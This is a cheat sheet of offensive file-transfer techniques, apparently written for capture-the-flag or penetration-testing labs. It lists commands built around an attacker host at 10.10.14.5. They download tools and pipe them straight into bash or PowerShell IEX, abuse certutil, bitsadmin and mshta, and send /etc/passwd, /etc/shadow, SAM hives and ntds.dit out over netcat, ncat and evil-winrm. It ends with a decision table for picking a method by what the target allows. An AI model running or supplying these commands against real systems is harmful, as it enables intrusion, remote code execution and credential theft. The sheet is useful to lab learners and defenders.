File Transfer Cheat Sheet

# wget
wget http://10.10.14.5:8000/shell.sh -O /tmp/shell.sh
wget http://10.10.14.5:8000/linpeas.sh -O /dev/shm/linpeas.sh

# curl
curl http://10.10.14.5:8000/shell.sh -o /tmp/shell.sh
curl http://10.10.14.5:8000/shell.sh | bash                        # pipe to shell
curl http://10.10.14.5:8000/linpeas.sh | bash

# Netcat
nc -lvnp 4444 > received.txt                  # receiver (target)
nc 10.10.14.5 4444 < file_to_send.txt         # sender (attacker)
# Or: nc -nv 10.10.14.5 4444 < /path/file     # push from target to attacker

# Reverse (attacker sends to target)
# Attacker listener: nc -lvnp 4444 < file.sh
# Target: nc 10.10.14.5 4444 > file.sh
nc -q 0 10.10.14.5 4444 < file.sh             # send (close after)

# Base64 inline transfer
base64 file.bin -w0 | xclip -sel clip         # encode + copy to clipboard
echo "BASE64STRING" | base64 -d > file.bin    # decode on target

# /dev/tcp (bash built-in)
exec 3<>/dev/tcp/10.10.14.5/8080
cat file.txt >&3                               # send file
cat <&3 > received.txt                         # receive file

# Python HTTP server + download
python3 -c 'import urllib.request; urllib.request.urlretrieve("http://10.10.14.5:8000/file.sh","/tmp/file.sh")'

# Python wget alternative
python3 -c 'from urllib.request import urlopen; open("/tmp/file","wb").write(urlopen("http://10.10.14.5:8000/file").read())'

# scp
scp user@10.10.14.5:/path/file /tmp/
scp -i id_rsa user@10.10.14.5:/path/file /tmp/

# rsync
rsync -av user@10.10.14.5:/path/ /tmp/

# === PowerShell WebClient ===
(New-Object Net.WebClient).DownloadFile("http://10.10.14.5/nc.exe","C:\Windows\Temp\nc.exe")
(New-Object Net.WebClient).DownloadString("http://10.10.14.5/script.ps1") | IEX
$wc = New-Object System.Net.WebClient; $wc.DownloadFile("http://10.10.14.5/file.exe","C:\temp\file.exe")

# === Invoke-WebRequest (PowerShell 3+) ===
Invoke-WebRequest -Uri http://10.10.14.5:8000/file.exe -OutFile C:\temp\file.exe
iwr http://10.10.14.5:8000/file.exe -OutFile C:\temp\file.exe
wget http://10.10.14.5:8000/file.exe -OutFile C:\temp\file.exe  # alias

# === CertUtil (CMD, no PS needed) ===
certutil -urlcache -f http://10.10.14.5/nc.exe C:\temp\nc.exe
certutil -urlcache -f http://10.10.14.5/nc.exe C:\temp\nc.exe split
certutil -urlcache -split -f http://10.10.14.5/file.txt file.txt

# === BITSAdmin (CMD) ===
bitsadmin /transfer jobname /download /priority high http://10.10.14.5/nc.exe C:\temp\nc.exe
bitsadmin /transfer myjob http://10.10.14.5:8000/file.exe C:\temp\file.exe

# === Start-BitsTransfer (PowerShell) ===
Start-BitsTransfer -Source http://10.10.14.5/file.exe -Destination C:\temp\file.exe

# === FTP (interactive) ===
echo open 10.10.14.5 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo PASS anonymous >> ftp.txt
echo binary >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

# === VBScript / mshta ===
mshta.exe http://10.10.14.5/file.hta

# === PowerShell inline (no file write) ===
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1')
IEX(iwr http://10.10.14.5/script.ps1 -UseBasicParsing)

# === SMB share mount ===
net use \\10.10.14.5\share /user:user pass
copy \\10.10.14.5\share\nc.exe C:\temp\

# Python HTTP server
python3 -m http.server 8000                       # Python 3
python -m SimpleHTTPServer 8000                   # Python 2
python3 -m http.server 8000 --directory /opt/tools

# Alternative: Python upload server (accepts PUT/POST)
python3 -m uploadserver 8000

# Impacket SMB server
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -user user -pass password
impacket-smbserver share /opt/tools -smb2support -ip 10.10.14.5

# Simple nginx (config file: /etc/nginx/sites-enabled/upload)
sudo nginx -t && sudo systemctl restart nginx
# nginx config: root /opt/share; autoindex on;

# PHP built-in server
php -S 0.0.0.0:8000

# Ruby HTTP server
ruby -run -e httpd /opt/share -p 8000

# FTP (pyftpdlib)
python3 -m pyftpdlib -p 21 -w
python3 -m pyftpdlib -p 21 -w -u anonymous -P anonymous

# === Linux ===
# Encode
base64 file.bin -w0
base64 file.sh | tr -d '\n'
md5sum file.bin                    # verify hash

# Decode
echo "BASE64STRING" | base64 -d > file.bin
echo "BASE64STRING" | base64 -d | bash      # decode and pipe to shell

# Single-line encode + copy
base64 -w0 shell.sh | xclip -sel clip       # copy to clipboard

# === Windows PowerShell ===
# Encode
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\file.exe"))
$data = Get-Content file.bin -Encoding Byte; [Convert]::ToBase64String($data)

# Decode
$b64 = "BASE64STRING"
[IO.File]::WriteAllBytes("C:\temp\file.exe", [Convert]::FromBase64String($b64))

# === Windows CMD ===
certutil -encode file.exe file.b64
certutil -decode file.b64 file.exe

# Connect first
evil-winrm -i 10.10.10.5 -u administrator -p 'Passw0rd!'

# In the evil-winrm shell:
upload /local/path/nc.exe C:\Windows\Temp\nc.exe
upload /opt/tools/winpeas.exe C:\Windows\Temp\winpeas.exe
upload /opt/tools/SharpHound.exe C:\Windows\Temp\SharpHound.exe

download C:\Windows\Temp\sam.hive /local/path/sam.hive
download C:\Windows\Temp\system.hive /local/path/system.hive
download C:\Windows\System32\config\ntds.dit /local/path/ntds.dit

# Upload directory
upload /opt/tools/ C:\Windows\Temp\tools\

# === Method 1: Push from attacker to target ===
# Attacker (send file):
nc -lvnp 4444 < file.sh
# Target (receive):
nc 10.10.14.5 4444 > file.sh
# Wait for transfer, then Ctrl+C

# === Method 2: Pull from target to attacker ===
# Attacker (receive):
nc -lvnp 4444 > received.txt
# Target (send):
nc 10.10.14.5 4444 < /etc/passwd

# === Method 3: Tar + netcat (transfer directory) ===
# Target (compress + send):
tar czf - /var/www | nc 10.10.14.5 4444
# Attacker (receive + extract):
nc -lvnp 4444 | tar xzf -

# === Method 4: with progress ===
# Attacker: nc -lvnp 4444 | pv -b > file.bin
# Target: nc 10.10.14.5 4444 < file.bin

# === Method 5: Encrypted transfer via ncat (ssl) ===
# Attacker: ncat --ssl -lvnp 4444 > file.txt
# Target: ncat --ssl 10.10.14.5 4444 < /etc/shadow

# SCP upload
scp /local/file user@10.10.10.5:/tmp/
scp -i key.pem /local/file user@10.10.10.5:/tmp/
scp -P 2222 file.txt user@10.10.10.5:/tmp/

# SCP download
scp user@10.10.10.5:/etc/passwd ./passwd
scp -r user@10.10.10.5:/var/www ./www_backup

# SFTP interactive
sftp user@10.10.10.5
sftp> put localfile
sftp> get /etc/passwd
sftp> ls
sftp> cd /tmp

# SFTP with key
sftp -i key.pem user@10.10.10.5

# xfreerdp with clipboard and drive mount
xfreerdp /v:10.10.10.5 /u:administrator /p:'Passw0rd!' +clipboard /drive:share,/opt/tools
xfreerdp /v:10.10.10.5 /u:user /p:pass /drive:tools,/opt/share

# After connected, access at:
# \\tsclient\share\file.exe
# \\tsclient\tools\nc.exe

# rdesktop (legacy)
rdesktop -u administrator -p 'Passw0rd!' -r disk:share=/opt/tools 10.10.10.5

# Windows native RDP (mstsc.exe) - Local Resources tab > More > Drives

# Attacker start SMB share
impacket-smbserver share . -smb2support
impacket-smbserver share /opt/tools -smb2support -username user -password pass

# Target Windows - mount
net use Z: \\10.10.14.5\share /user:user pass
copy Z:\nc.exe C:\temp\nc.exe
net use Z: /delete

# Target Windows - no mount, direct copy
copy \\10.10.14.5\share\nc.exe C:\temp\
dir \\10.10.14.5\share\

# Target Linux - mount
sudo mount -t cifs //10.10.14.5/share /mnt -o username=user,password=pass
sudo mount -t cifs //10.10.14.5/share /mnt -o user=guest,password=

Target has wget/curl?       -> wget or curl (simplest)
Target has PowerShell?       -> IWR or WebClient
Target has certutil?         -> certutil -urlcache -f
Target has bitsadmin?        -> bitsadmin /transfer (background)
No tools, bash available?    -> base64 encode + decode, OR /dev/tcp
No tools, interactive shell? -> base64 copy-paste
Firewall blocks outgoing?    -> nc from attacker (reverse), or SMB share
Evil-WinRM session?          -> upload / download commands
Need directory transfer?     -> tar | nc
Metasploit session?          -> meterpreter upload/download